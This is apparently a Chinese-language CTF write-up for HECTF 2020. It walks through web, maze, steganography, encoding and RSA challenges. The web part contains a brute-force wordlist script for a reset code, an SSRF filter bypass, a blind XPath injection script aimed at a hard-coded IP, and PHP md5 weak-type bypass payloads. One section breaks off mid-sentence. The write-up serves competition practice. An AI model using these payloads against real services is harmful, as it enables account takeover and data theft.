HECTF_2020
web1
打开题目发现要手机号登入,F12查看源码发现有个手机号<-- 15970773575 -->;尝试找回密码,根据hint.php给的提示发现,验证码是要通过爆破得来,且长度为4位;
使用脚本生成字典
dz.py:
f=open('zidian.txt','w')
for i in range(9999):
s=str(i)
if len(s)==1:
s="000"+s
if len(s)==2:
s="00"+s
if len(s)==3:
s="0"+s
print s
f.write(s+'\n')
然后通过bp破解一下
得到0233是验证码,修改密码登入得到flag
Ssrf
查看源代码发现过滤了
ip2long('127.0.0.0')>>24==$int_ip>>24||ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;
尝试使用url=http://loaclhost/flag.php,无果最后使用url=http://0.0.0.0/flag.php成功绕过得到flag
injection
题目名称是注入,但结果sql注入无果,然后发现报错是:Warning: SimpleXMLElement::xpath():
然后查看题目描述"X…X…X.Xpath!咚咚咚 是admin么,flag格式为flag{}。";百度一下发现是xpath注入,因为没有回显结果,所以尝试盲注
import requests
url='http://114.55.165.246:8082/?'
r=requests.Session()
str_all="qwertyuiopasdfghjklzxcvbnm0123456789_!{}-"
def password():
result=""
for i in range(1,40):
for j in str_all:
payload="'orsubstring((//user[position()=1]/password),"+str(i)+",1)='"+j+"'or ''='"
data="username="+payload+"&password=123"
s=r.get(url+data+"&submit=%E7%99%BB%E5%BD%95")
#print data+"&submit=%E7%99%BB%E5%BD%95"
if 'not admin' in s.text:
result+=j
print(result)
break
password()
最后
username=admin
password=339db714647a1d66b85cd08442287841
ezphp
审计源码发现
if($_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2'])){
这里使用弱类型即可绕过:
param1[]=a¶m2[]=s
继续下一步
$md5_1 = md5($string_1);
$md5_2 = md5($string_2);
if($md5_1 != $md5_2){
$a = strtr($md5_1, 'cxhp', '0123');
$b = strtr($md5_2, 'cxhp', '0123');
if($a == $b){
echo $flag;
}
发现md5碰撞,使用0e开头绕过,找到个原题2019NJUPT的easyphp:
https://zhzhdoai.github.io/2019/11/24/WRITEUP-2019NJUPT-web%E9%A2%98%E8%A7%A3/
得到str1=2120624&str2=240610708最终的payload: param1[]=a¶m2[]=b&str1=2120624&str2=240610708
[boom]Maybe_is_medium
非预期解,链接nc 121.196.32.184 12003就能获取shell得到flag
easymaze
老套路迷宫题
还原一下迷宫:
1000011000
1100011100
0100010100
0111110100
0000110100
0000000100
0000000110
0000000010
0000000011
0000000001
0000000000
0000000000
00000000
走一遍就是flag
png
在kali上点开图片显示IHDR:CRC error错误,猜测图片改了宽高;然后传到windows下查看图片,图片是少了一些,托到Winhex下修改宽高,如下图:
保存图片后能看到一半flag,继续分析图片;用strings 命令查看图片字符串能看到末尾有一串base64,拿去 http://ctf.ssleye.com/ 这个网址解密即可得到另外一半flag
不说人话
打开文件是一串!?.组成的编码,拿去 https://www.splitbrain.org/services/ook 这个网址解密即可得到flag
在这里签到
通过https://www.sojson.com/encrypt_rabbit.html进行 rabbit解密
然后base64 解密;再base32 解密;最后hex 解密得到flag
no blank space
等到赛方给了第二个提示,去网上科普了一下知道了这是博多电码
然后拿去https
rsa
已知 公钥(n, e) 和 密文 c,所以首先将n用yafu分解为q,p;
脚本解得flag:
import gmpy2
p = 2499568793
q = 4568695582742345507136251229217400959960856046691733722988345503429689799935696593516299458516865110324638359470761456115925725067558499862591063153473862179550706262380644940013531317571260647226561004191266100720745936563550699000939117068559232225644277283541933064331891245169739139886735615435506152070330233107807124410892978280063993668726927377177983100529270996547002022341628251905780873531481682713820809147098305289391835297208890779643623465917824350382592808578978330348769060448006691307027594085634520759293965723855183484366752511654099121387261343686017189426761536281948007104498017003911
e = 65537
c = 575061710950381118206735073806398116370706587076775765253483131078316908073202143802386128272374323616239083134747318254436706806781744501903333604772961927966747648954315962269321297121495398057938617145017999482722197661065698707836824505023856306403892307944203245563411961302499347604417024064678999003637933185177922884103362203639349298263339808508185861692596967147081382566246627668898774233029198694500565511361867375668367875805985660705137109665107860799277624050210666866958502948062330037309873148963011192405012811945540153592090345668265964477204465327474208098404082920129178960510763496025906621820
n = p * q
fn = (p - 1) * (q - 1)
d = gmpy2.invert(e, fn)
h = hex(gmpy2.powmod(c, d, n))[2:]
if len(h) % 2 == 1:
h = '0' + h
s = h.decode('hex')
print s